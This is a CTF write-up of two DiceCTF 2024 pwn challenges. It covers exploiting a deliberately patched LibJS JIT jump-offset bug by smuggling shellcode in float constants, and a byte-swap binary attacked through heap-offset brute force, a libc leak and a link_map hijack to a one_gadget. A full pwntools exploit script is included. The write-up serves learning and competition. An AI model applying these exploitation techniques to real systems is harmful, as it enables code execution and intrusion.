I played DiceCTF 2024 Quals with the Blue Water team, and we managed to secure first place. A huge shoutout and thanks to my awesome teammates for their fantastic teamwork throughout the event!
Below is the writeup for the pwn challenges that I managed to solve.
Pwn
hop
Description
Using 32 bits to encode a short jump is so wasteful… this will surely be better🐞🤓
nc mc.ax 32421
Initial Analysis
In this challenge, we were provided with a zip file containing the Dockerfile used to build the challenge, along with a patch file. Below is the content of the patch file.
The patch targets the JIT (Just-In-Time) compiler of LibJS in SerenityOS, and examining it reveals a significant bug. The patch intends to replace the relative JMP that takes a 32-bit offset with a short JMP that takes an 8-bit offset. The problem lies in how small_offset is calculated: the patch adds 3 to the offset and then casts the result to int8_t. If offset + 3 exceeds INT8_MAX, the cast wraps around and produces a negative offset. As a result, the JIT-compiled code jumps backward to a preceding instruction instead of forward to the intended destination, disrupting the intended flow of execution.
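To make the wraparound concrete, here is a minimal Python sketch of the narrowing step described above. The helper names `to_int8` and `short_jump_offset` are made up for illustration and only model the "add 3, then cast to int8_t" behavior; they are not taken from the patch itself.

```python
def to_int8(value: int) -> int:
    """Keep the low 8 bits and reinterpret them as a signed 8-bit integer."""
    value &= 0xFF
    return value - 0x100 if value >= 0x80 else value


def short_jump_offset(offset: int) -> int:
    # Models the computation described in the text: add 3, then narrow to int8_t.
    return to_int8(offset + 3)


for offset in (0x10, 0x7C, 0x7D, 0xF0):
    print(hex(offset), "->", short_jump_offset(offset))
```

Any forward offset of 0x7d or more ends up negative after the cast, which is exactly the case where the emitted short jump goes backward.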
Solution
Based on the bug we identified, let’s start by setting up our local environment. The first step involves cloning the SerenityOS repository and applying the patch.
Before proceeding to build the js engine, a small adjustment will simplify our debugging process. Navigate to the serenity/Userland/Libraries/LibJS/JIT/Compiler.cpp file and modify the DUMP_JIT_DISASSEMBLY value to 1. This adjustment ensures that whenever we execute JavaScript code using the js engine that triggers JIT compilation, the engine will automatically dump the disassembly of the JIT-compiled code. With this setting enabled, we are now ready to proceed with building the js engine.
./Meta/serenity.sh build lagom js
First, we’ll begin by crafting a simple script to examine the JIT-compiled code’s behavior.
Upon analyzing the dumped results, we notice that each return statement triggers a relative JMP instruction to common_exit, which the patch then converts into a jmp short. Observing the disassembly, our goal becomes clear: to extend the jmp short offset when returning 41414141. The presence of return [42424242] in the JIT-compiled code, as mentioned above, indicates that to enlarge the jmp short offset for returning 41414141, we can simply incorporate multiple values to be returned in that line. For instance, altering the script as follows increases the offset.
Each new constant added to the returned array increases the offset by 0xd, which suggests a way to exploit the bug: keep adding constants until the offset no longer fits in an int8_t. By experimenting with various patterns, I discovered a specific code snippet that successfully triggers the bug.
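As a rough estimate of how many constants are needed, the sketch below assumes the offset grows by exactly 0xd per constant and that the overflow condition is offset + 3 > INT8_MAX. The starting offset 0x20 is a made-up value, not one read from the real dump, and the real JIT output may not grow this uniformly.

```python
STRIDE = 0xD      # growth per extra constant, as observed in the dump
INT8_MAX = 0x7F


def constants_needed(base_offset: int) -> int:
    """Smallest n such that base_offset + n * STRIDE + 3 no longer fits in int8_t."""
    n = 0
    while base_offset + n * STRIDE + 3 <= INT8_MAX:
        n += 1
    return n


# 0x20 is a hypothetical starting offset, used only for illustration.
print(constants_needed(0x20))
```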
Upon closer examination, we observed that during the process of returning [41414141], the jmp short instruction becomes corrupted, transforming into jmp short 0x81. This alteration causes the instruction to jump backward. The objective now shifts to adjusting our POC, aiming to redirect the corrupted jmp rel8 destination to a segment of bytecode under our control. The following JavaScript code achieves this by successfully setting the jump destination to bytecode we manipulate.
Notably, the <Block 4+0x7> falls under our control, as it is part of the hexadecimal encoding of our floating-point parameter (2261634.5098039214, which translates to 0x4141414141414141). This means we can smuggle our shellcode into the JIT-compiled code. By making the return statement include additional values that represent our shellcode in floating-point format, we can effectively insert executable code into the JIT-compiled output.
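The mapping between a double and its 8 raw bytes can be checked with Python's struct module. This is a minimal sketch, not the script I used for the challenge; the helper names and the NOP padding are assumptions made for illustration.

```python
import struct


def bytes_to_double(chunk: bytes) -> float:
    """Interpret up to 8 bytes (padded with NOPs) as a little-endian IEEE-754 double."""
    chunk = chunk.ljust(8, b"\x90")
    if len(chunk) != 8:
        raise ValueError("at most 8 bytes fit in one double")
    return struct.unpack("<d", chunk)[0]


def double_to_bytes(value: float) -> bytes:
    """Return the 8 raw bytes that encode the given double."""
    return struct.pack("<d", value)


print(bytes_to_double(b"A" * 8))
print(double_to_bytes(2261634.5098039214).hex())
```

One caveat when picking shellcode chunks: byte patterns that decode to NaN may not survive intact, since an engine is free to canonicalize NaN values, so it is safer to avoid them.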
What I did here involves smuggling shellcode by appending additional values to the return statement. Specifically, within the <Block 4+0x7>, I did another backward jump that directs execution to the previously smuggled shellcode. For the creation of this smuggled shellcode, I used the script detailed below:
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+8h] [rbp-18h] BYREF
  __int64 v5; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  puts(_art);
  puts(s);
  while ( data[0] )
  {
    v5 = 0LL;
    printf("\n\x1B[31;49;1;4m%s\x1B[0m\n\n\n", data);
    puts(
      "The sound of \x1B[0;33mgion shoja bells\x1B[0m echoes the impermanence of all things. The color\n"
      "of \x1B[0;33msala flowers\x1B[0m reveals the truth that the prosperous must decline. \x1B[4;33mHowever\x1B[0m! We\n"
      "are the exception:");
    __isoc99_scanf("%zu %zu", &v4, &v5);
    clap(v4, v5);
  }
  return 0;
}
The binary’s structure is straightforward. Essentially, it allows for the swapping of bytes within any rw (read-write) area of the binary, specifically relative to the bss section (where data is stored). This byte-swapping capability is the sole interaction allowed, and the program terminates if the value at data[0] is set to NULL.
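The body of clap is not shown in the decompilation above, so the following Python model is an assumption: it treats clap as an XOR swap of two bytes addressed relative to data. That assumption is consistent with the exploit script further down, which calls clap(x, x) to zero a byte. The bytearray `mem` and the parameter `data_base` are stand-ins for process memory and the address of data.

```python
def clap(mem: bytearray, data_base: int, a: int, b: int) -> None:
    """Model of the swap primitive: XOR-swap the bytes at data+a and data+b."""
    i, j = data_base + a, data_base + b
    mem[i] ^= mem[j]
    mem[j] ^= mem[i]
    mem[i] ^= mem[j]


mem = bytearray([0x11, 0x22, 0x33, 0x44])
clap(mem, 0, 0, 3)   # ordinary swap of two different bytes
print(mem.hex())
clap(mem, 0, 1, 1)   # swapping a byte with itself zeroes it under XOR swap
print(mem.hex())
```

Under this model the primitive gives two operations: moving existing bytes around, and writing a zero byte anywhere writable.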
Solution
Despite the binary’s simplicity, crafting an exploit poses a significant challenge.
Brute-force heap offset
First, we can leak any byte whose offset relative to data is known by swapping target_offset with offset 0x96. Offset 0x96 holds the final byte of the data string, so once the target byte has been swapped into data[0x96], it is displayed as part of the prompt.
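The leak can be modeled offline as "swap in, read, swap back", repeated per byte to rebuild a pointer. The sketch below simulates memory with a bytearray; the helper names are made up, the XOR swap is an assumption about clap, and in the real exploit the byte is read from the printed prompt rather than from memory directly.

```python
LEAK_SLOT = 0x96  # offset of the last byte of the data string, per the text


def xor_swap(mem: bytearray, i: int, j: int) -> None:
    mem[i] ^= mem[j]
    mem[j] ^= mem[i]
    mem[i] ^= mem[j]


def leak_byte(mem: bytearray, data_base: int, target: int) -> int:
    """Swap the target byte into the leak slot, read it, then swap it back."""
    xor_swap(mem, data_base + target, data_base + LEAK_SLOT)
    value = mem[data_base + LEAK_SLOT]  # stands in for parsing the prompt
    xor_swap(mem, data_base + target, data_base + LEAK_SLOT)
    return value


def leak_pointer(mem: bytearray, data_base: int, target: int, nbytes: int = 6) -> int:
    """Rebuild a little-endian pointer one byte at a time."""
    return sum(leak_byte(mem, data_base, target + i) << (8 * i) for i in range(nbytes))


mem = bytearray(0x200)
mem[LEAK_SLOT] = ord("!")
mem[0x100:0x106] = (0x7FF7628F12E0).to_bytes(6, "little")  # made-up pointer value
print(hex(leak_pointer(mem, 0, 0x100)))
```

Note that a leaked zero byte terminates the printed string, so the real script has to treat "nothing printed" as 0x00.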
The primary challenge arises from the fact that the bss area lacks valuable information for leakage, except for the PIE base address. This limitation prompts the exploration of alternative strategies, such as attempting to brute-force the heap offset. Notably, if a viable offset within the heap can be identified, it becomes feasible to trace back to the heap’s top chunk, and we can do more with it later on.
Is brute-forcing the heap offset a feasible strategy? Indeed, it is. Typically, the heap spans an area of 0x21000 bytes. Observations indicate that the gap between the bss and heap areas ranges from approximately 0x0XXY000 to 0x1XXY000. Because the heap's default size exceeds 0x10000, once the XX byte is guessed correctly, the Y nibble no longer needs to be guessed, which reduces the brute-force effort to roughly 8 bits. This reduction makes the brute-force approach quite practical.
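A back-of-the-envelope check of the "roughly 8 bits" figure: the sketch below assumes the gap is page-aligned and uniformly distributed over 0x0000000 to 0x1ffffff, and that a guess succeeds whenever a fixed offset lands anywhere inside the 0x21000-byte heap. Both assumptions are simplifications of the observations above, not measured facts.

```python
import math

HEAP_SIZE = 0x21000    # typical initial heap size, from the text
GAP_RANGE = 0x2000000  # assumed span of possible bss-to-heap gaps
PAGE = 0x1000

heap_pages = HEAP_SIZE // PAGE
candidate_pages = GAP_RANGE // PAGE
p_hit = heap_pages / candidate_pages   # chance that one fixed guess lands in the heap
bits = -math.log2(p_hit)
expected_attempts = 1 / p_hit

print(f"{heap_pages} of {candidate_pages} pages, about {bits:.2f} bits, "
      f"about {expected_attempts:.0f} attempts on average")
```

Under these assumptions a single fixed guess succeeds about once in every 250 connections, which matches the effort we saw in practice only loosely, since each attempt also has to pass the proof of work.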
Leak libc address
Suppose we have brute-forced the heap offset and identified the top chunk. The next question is: what possibilities does this open up? A close examination of the heap chunks in gdb reveals the default layout.
Unfortunately, it does not contain any directly useful values for leakage. However, an intriguing opportunity arises with the potential to corrupt the top chunk size.
Now, consider the scenario where the top chunk size is altered from 0x20550 to merely 0x550 with the swap. It’s observed that triggering a malloc(0x800) call is straightforward via scanf, especially by prefixing our inputted number with numerous leading zeros. What implications would this manipulation have when combined with a malloc(0x800) call triggered by scanf?
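The size arithmetic behind this step can be sketched as follows. The value 0x20551 is the top chunk size including the PREV_INUSE bit, as noted in the exploit script; the helper name `zero_third_byte` is made up. The comments about glibc behavior reflect my understanding of sysmalloc (the same idea as House of Orange) and should be read as an assumption rather than a specification.

```python
PAGE_MASK = 0xFFF
PREV_INUSE = 0x1


def zero_third_byte(size_field: int) -> int:
    """Zero byte index 2 of the little-endian size field, as one self-swap would."""
    raw = bytearray(size_field.to_bytes(8, "little"))
    raw[2] = 0
    return int.from_bytes(raw, "little")


old_size = 0x20551
new_size = zero_third_byte(old_size)
request = 0x800  # allocation triggered through scanf, per the text

print(hex(new_size))
# The low 12 bits are untouched, so the end of the top chunk stays page-aligned
# and the PREV_INUSE bit stays set.
print((old_size & PAGE_MASK) == (new_size & PAGE_MASK))
# The shrunken top chunk can no longer serve the request, so the allocator has
# to grow the heap and (as I understand it) frees the old top chunk.
print((new_size & ~0x7) < request)
```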
Upon inspecting the heap’s state in gdb following our manipulation, we observe the presence of an unsorted bin chunk. This opens the door to leaking a libc address. Having the libc address leads to several exploitation pathways.
Exploitation via link_map
In our approach, we opted for the link_map exploitation technique, as detailed in nobodyisnobody’s article. To effectively trigger the code outlined in glibc’s dl-fini.c, a series of steps is required:
Nullify link_map->l_info[DT_FINI_ARRAY].
Overwrite link_map->l_info[DT_FINI] with an address we control, allowing us to modify the d_un.d_ptr value subsequently.
Adjust link_map->l_addr and link_map->l_info[DT_FINI]->d_un.d_ptr so that the sum of their values points to our desired function address.
Trigger exit.
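The steps above boil down to controlling one addition. As a minimal sketch, assuming the DT_FINI call target is computed as l_addr plus d_un.d_ptr (which is how I read dl-fini.c), the helper below shows two ways to reach the same target. The function name and the sample addresses are made up for illustration.

```python
MASK64 = 0xFFFFFFFFFFFFFFFF


def fini_target(l_addr: int, d_ptr: int) -> int:
    """Address called at exit for DT_FINI: l_addr + d_un.d_ptr, with 64-bit wraparound."""
    return (l_addr + d_ptr) & MASK64


# Made-up addresses, for illustration only.
wanted = 0x7FF7626EBC85
pie_base = 0x555555554000

# Option 1: zero l_addr and store the full target in d_ptr (what our script does).
print(hex(fini_target(0, wanted)))
# Option 2: keep l_addr and store the difference in d_ptr.
print(hex(fini_target(pie_base, (wanted - pie_base) & MASK64)))
```

With a swap-only write primitive, option 1 is simpler because zeroing l_addr is a single self-swap per byte.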
Exploring the possibilities with one_gadget, we identified one good gadget.
The next step involves placing the one_gadget address into the link_map. However, it’s important to remember that our ability to write is constrained to swapping bytes. Given this limitation, how can we insert the one_gadget address into the link_map?
A reliable method involves leaking the stack address, then positioning our targeted bytes on the stack through scanf, followed by swapping them into place. However, we discovered this trick quite late in the process and had already secured the flag using our initial approach, which we will outline here.
The one_gadget address consists of 6 bytes, and the higher 3 bytes can be easily written by sourcing them from the libc GOT area. We simply select any libc address present there whose higher 3 bytes match those of our chosen one_gadget across multiple runs.
The 1st lower byte of the one_gadget address is consistently 0x85. Upon examining the memory, we discovered a value within the ld rw area that invariably contains the 0x85 byte.
Regarding the 2nd lower byte of the one_gadget, it is influenced by ASLR. Nonetheless, a thorough memory scan revealed a value in the ld rw area that consistently matches the 2nd lower byte of the one_gadget address across multiple executions.
Unfortunately, for the 3rd lower byte, there is no address that consistently mirrors the one_gadget’s 3rd lower byte. Therefore, we relied on luck :), scanning the ld memory with the swap function in each run, hoping to find a byte in the ld area that could match the 3rd lower byte.
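To see which bytes of the one_gadget address are fixed and which depend on ASLR, the sketch below splits the address into its six little-endian bytes. The offset 0xebc85 comes from our script; the two libc bases are made-up, page-aligned examples.

```python
ONE_GADGET_OFFSET = 0xEBC85  # from the exploit script


def gadget_bytes(libc_base: int) -> list:
    """Return the six little-endian bytes of libc_base + ONE_GADGET_OFFSET."""
    addr = libc_base + ONE_GADGET_OFFSET
    return list(addr.to_bytes(6, "little"))


for base in (0x7FF762600000, 0x7F1234567000):  # hypothetical bases
    print(hex(base), [hex(b) for b in gadget_bytes(base)])
```

Because the base is page-aligned, the lowest byte is always 0x85 and only the upper nibble of the 2nd byte changes. The 3rd byte is fully randomized, which is why it had to be searched for at runtime.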
Brute-forcing the heap offset took quite some time, and even when it succeeded, we sometimes failed to find the 3rd byte in the ld area before the connection timed out. However, one run succeeded, and we were able to fetch the flag. Below is our full script with detailed comments:
import os
import warnings

from pwn import *

# Filter ld area to be scanned. Skip addresses that always
# contain zero bytes. `out` file example
'''
0x7ff7628f0000: 0x0000000000039e80 0x0000000000000000
0x7ff7628f0010: 0x0000000000000000 0x00007ff7627fda10
0x7ff7628f0020 <_dl_signal_exception@got.plt>: 0x00007ff7627fd960 0x00007ff7627fd9b0
0x7ff7628f0030 <_dl_catch_error@got.plt>: 0x00007ff7627fdb30 0x0000000000000000
0x7ff7628f0040 <_rtld_global>: 0x00007ff7628f12e0 0x0000000000000004
0x7ff7628f0050 <_rtld_global+16>: 0x00007ff7628f15a0 0x0000000000000000
...
'''
lines = open('out', 'rb').readlines()
ld_rw_base = 0x00007ff7628f0000
map_offset = {}
rev_map = {}
for line in lines:
    addr = line.split(b'<')[0].split(b':\t')[0]
    offset = int(addr, 16) - ld_rw_base
    val_1 = int(line.split(b'\t')[1], 16)
    for idx, val in enumerate(p64(val_1)):
        if val != 0:
            rev_map[val] = 1
            map_offset[offset+idx] = val
    offset += 8
    val_2 = int(line.split(b'\t')[2], 16)
    for idx, val in enumerate(p64(val_2)):
        if val != 0:
            rev_map[val] = 1
            map_offset[offset+idx] = val

context.arch = 'amd64'
context.encoding = 'latin'
context.log_level = 'INFO'
warnings.simplefilter("ignore")

local_url = "localhost"
local_port = 5000
remote_url = "mc.ax"
remote_port = 31040
gdbscript = '''
'''

def conn():
    if args.LOCAL:
        r = remote(local_url, local_port)
    else:
        r = remote(remote_url, remote_port)
    return r

# Brute-force heap offset
num_try = -1
while True:
    num_try += 1
    print(f'{num_try= }')
    found = False
    try:
        r = conn()

        # POW solver
        if not args.LOCAL:
            r.recvuntil(b'work:\n')
            out = r.recvline().strip()
            proof = os.popen(out.decode()).readlines()[0].strip()
            r.sendlineafter(b'solution: ', proof.encode())

        def clap(v1, v2):
            r.sendlineafter(b'on:', (str(v1)+' '+str(v2)).encode())

        def clap_str(v1, v2):
            r.sendlineafter(b'on:', (v1+' '+v2).encode())

        def clap_bytes(v1, v2):
            r.sendlineafter(b'on:', (v1+b' '+v2))

        # BRUTEFORCE HEAP OFFSET
        '''
        0x075aa98
        0x0da8a98
        0x1613a98
        0x1eeca98
        '''
        curr_heap_offset = 0x827a98
        leak = 0x1b
        ctr = 0x0

        # Backtrack to find top_chunk, identified by the leak value is 0x51
        # (because top chunk size value is 0x20551)
        while leak == 0x1b:
            curr_heap_offset -= 0x1000
            print('offset = '+hex(curr_heap_offset))
            clap(curr_heap_offset, 0x96)
            r.recvuntil('soul!', drop=True)
            leak = u8(r.recv(1))
        print('top_chunk found: '+hex(leak))
        print('at offset = '+hex(curr_heap_offset))
        found = leak == 0x51
    except:
        print(f'Failed...')
        r.close()
        continue
    if found:
        # Restore swapped value so that top chunk size isn't corrupted yet.
        clap(curr_heap_offset, 0x96)
        break
    else:
        r.close()
        continue

# PIE Leak
pie_leak = 0
for i in range(6):
    clap(-(0x18-i), 0x96)
    r.recvuntil('soul!', drop=True)
    pie_leak = pie_leak | (u8(r.recv(1)) << (i*8))
    clap(-(0x18-i), -(0x18-i))  # restore original value
info(f'{hex(pie_leak)= }')

# Overwrite top chunk third bytes to 0,
# resulting in top chunk size become 0x551
curr_heap_offset += 0x2
print(f'{hex(curr_heap_offset)= }')
clap(curr_heap_offset, curr_heap_offset)
print(f'Top chunk overwritten to 0x551...')

# Trigger malloc in scanf, so that we will have unsorted bin
# in the heap, and leak the libc address.
clap_str('500', '0'*0x500+'500')
print(f'Get unsorted bin to heap...')
curr_heap_offset += 0x6+0x8
leaked_libc = 0
for i in range(6):
    clap(curr_heap_offset+i, 0x96)
    r.recvuntil('soul!', drop=True)
    leaked_libc = leaked_libc | (u8(r.recv(1)) << (i*8))
    clap(curr_heap_offset+i, 0x96)  # restore original value
info(f'{hex(leaked_libc)= }')
libc_base = leaked_libc - (0x21ac80+96)
info(f'{hex(libc_base)= }')
info(f'{hex(pie_leak)= }')
one_gadget = (libc_base+0xebc85)

# Leak dl_resolve to calculate ld_base and link_map address
base_offset = pie_leak+0x18
dl_resolve_got = libc_base+0x21a010
dl_offset = dl_resolve_got-base_offset
leaked_ld = 0
for i in range(6):
    clap(dl_offset+i, 0x96)
    r.recvuntil('soul!', drop=True)
    leaked_ld = leaked_ld | (u8(r.recv(1)) << (i*8))
    clap(dl_offset+i, 0x96)
info(f'{hex(leaked_ld)= }')
ld_base = leaked_ld-0x15d30
info(f'{hex(ld_base)= }')
link_map = ld_base+0x3b2e0
info(f'{hex(link_map)= }')

# Nullify link_map->l_addr
l_addr_offset = link_map-base_offset
for i in range(6):
    clap(l_addr_offset+i, l_addr_offset+i)
print("nullify l_addr")

# Nullify link_map->l_info[DT_FINI_ARRAY]
dt_fini_array_offset = link_map+0x0110-base_offset
for i in range(6):
    clap(dt_fini_array_offset+i, dt_fini_array_offset+i)
print("nullify dt_fini")

# Overwrite link_map->l_info[DT_FINI] with l_name
# We will use the `l_name` stored address as our link_map->l_info[DT_FINI] value
l_name_offset = link_map+0x8-base_offset
dt_fini_offset = link_map+0xa8-base_offset
for i in range(0x8):
    clap(dt_fini_offset+i, dt_fini_offset+i)
for i in range(6):
    clap(l_name_offset+i, dt_fini_offset+i)
print("finish overwrite")

# Leak link_map->l_info[DT_FINI] value that just got overwritten
leaked_dt_fini = 0
dt_fini_offset = link_map+0xa8-base_offset
for i in range(6):
    clap(dt_fini_offset+i, 0x96)
    r.recvuntil('soul!', drop=True)
    leaked_dt_fini = leaked_dt_fini | (u8(r.recv(1)) << (i*8))
    clap(dt_fini_offset+i, 0x96)
info(f'{hex(leaked_dt_fini)= }')

# Set one_gadget in link_map->l_info[DT_FINI]->d_un.d_ptr
target_offset = leaked_dt_fini+0x8-base_offset
for i in range(0x8):
    clap(target_offset+i, target_offset+i)

## Set higher 3 bytes, taken from one of the values stored in libc rw area
from_offset = libc_base+0x21b518-base_offset
for i in range(3, 6):
    clap(from_offset+i, target_offset+i)
print("partial")

## Set 1st byte
target_offset = leaked_dt_fini+0x8-base_offset
clap(ld_base-0x15f8-base_offset, target_offset)
print("1st byte")

## Set 2nd byte
target_offset = leaked_dt_fini+0x8+1-base_offset
clap(ld_base+0x3b091-base_offset, target_offset)
print("2nd byte")

## Search 3rd byte
print('searching last byte')
last = (one_gadget >> 16) & 0xff
print(f'{hex(last)= }')
offset = ld_base+0x3a000
count = 0
correct_offset = 0
for key, _ in map_offset.items():
    clap(offset+key-base_offset, 0x96)
    r.recvuntil('soul!', drop=True)
    temp = r.recvuntil(b'\x1b')
    if (temp[0] == 0x1b) and (len(temp) == 1):
        val = 0
    else:
        val = temp[0]
    clap(offset+key-base_offset, 0x96)
    print('count = '+hex(count), f'{hex(key)= }, {hex(last)= }, {hex(val)}')
    if val == last:
        correct_offset = offset+key
        break
    count += 1

## Set 3rd byte
target_offset = leaked_dt_fini+0xa-base_offset
clap(correct_offset-base_offset, target_offset)
print("3rd byte")

# Just to validate that our write is success
target_offset = leaked_dt_fini+0x8-base_offset
test_valzz = 0
for i in range(6):
    clap(target_offset+i, 0x96)
    r.recvuntil('soul!', drop=True)
    test_valzz = test_valzz | (u8(r.recv(1)) << (i*8))
    clap(target_offset+i, 0x96)
info(f'{hex(one_gadget)= }')
info(f'{hex(test_valzz)= }')

# data[0] becomes NULL, so the loop ends and exit is triggered
clap(0, 0)
r.interactive()